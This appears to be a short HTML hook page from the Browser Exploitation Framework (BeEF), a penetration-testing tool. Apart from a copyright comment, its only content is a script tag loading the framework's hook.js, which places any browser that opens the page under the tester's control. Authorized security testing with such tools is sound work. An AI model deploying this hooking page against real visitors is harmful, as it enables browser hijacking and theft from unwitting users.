13 lines
270 B
HTML
13 lines
270 B
HTML
<!--
|
|
Copyright (c) 2006-2025 Wade Alcorn - wade@bindshell.net
|
|
Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
See the file 'doc/COPYING' for copying permission
|
|
-->
|
|
<html>
|
|
<head>
|
|
<script src="/hook.js"></script>
|
|
</head>
|
|
<body>
|
|
</body>
|
|
</html>
|